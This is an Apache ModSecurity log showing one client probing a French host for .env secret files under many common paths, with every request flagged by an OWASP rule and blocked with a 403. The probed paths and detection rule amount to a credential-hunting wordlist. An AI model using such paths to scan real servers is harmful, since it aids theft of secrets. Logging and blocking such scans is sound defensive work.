[Mon May 11 16:41:34.777211 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCMAAAAQo"]
[Mon May 11 16:41:34.777708 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCMAAAAQo"]
[Mon May 11 16:41:34.780397 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCMAAAAQo"]
[Mon May 11 16:41:34.941495 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCMgAAAQo"]
[Mon May 11 16:41:34.941977 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCMgAAAQo"]
[Mon May 11 16:41:34.942222 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCMgAAAQo"]
[Mon May 11 16:41:35.185233 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCMwAAAQo"]
[Mon May 11 16:41:35.185726 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCMwAAAQo"]
[Mon May 11 16:41:35.226528 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCMwAAAQo"]
[Mon May 11 16:41:35.354775 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNAAAAQo"]
[Mon May 11 16:41:35.355284 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNAAAAQo"]
[Mon May 11 16:41:35.355565 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNAAAAQo"]
[Mon May 11 16:41:35.524291 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNgAAAQo"]
[Mon May 11 16:41:35.524883 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNgAAAQo"]
[Mon May 11 16:41:35.525184 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNgAAAQo"]
[Mon May 11 16:41:35.771492 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNwAAAQo"]
[Mon May 11 16:41:35.771979 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNwAAAQo"]
[Mon May 11 16:41:35.772213 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCNwAAAQo"]
[Mon May 11 16:41:35.950863 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCOAAAAQo"]
[Mon May 11 16:41:35.951363 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCOAAAAQo"]
[Mon May 11 16:41:35.951598 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agHqn0WKUxpmnkK7zHyCOAAAAQo"]
[Mon May 11 16:41:36.232194 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOQAAAQo"]
[Mon May 11 16:41:36.232696 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOQAAAQo"]
[Mon May 11 16:41:36.236802 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOQAAAQo"]
[Mon May 11 16:41:36.416873 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOgAAAQo"]
[Mon May 11 16:41:36.417371 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOgAAAQo"]
[Mon May 11 16:41:36.417599 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOgAAAQo"]
[Mon May 11 16:41:36.585949 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOwAAAQo"]
[Mon May 11 16:41:36.586454 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOwAAAQo"]
[Mon May 11 16:41:36.586708 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCOwAAAQo"]
[Mon May 11 16:41:36.760896 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCPAAAAQo"]
[Mon May 11 16:41:36.761397 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCPAAAAQo"]
[Mon May 11 16:41:36.761620 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCPAAAAQo"]
[Mon May 11 16:41:36.932639 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCPQAAAQo"]
[Mon May 11 16:41:36.933177 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCPQAAAQo"]
[Mon May 11 16:41:36.933433 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agHqoEWKUxpmnkK7zHyCPQAAAQo"]
[Mon May 11 16:41:37.104695 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCPwAAAQo"]
[Mon May 11 16:41:37.105241 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCPwAAAQo"]
[Mon May 11 16:41:37.105495 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agHqoUWKUxpmnkK7zHyCPwAAAQo"]
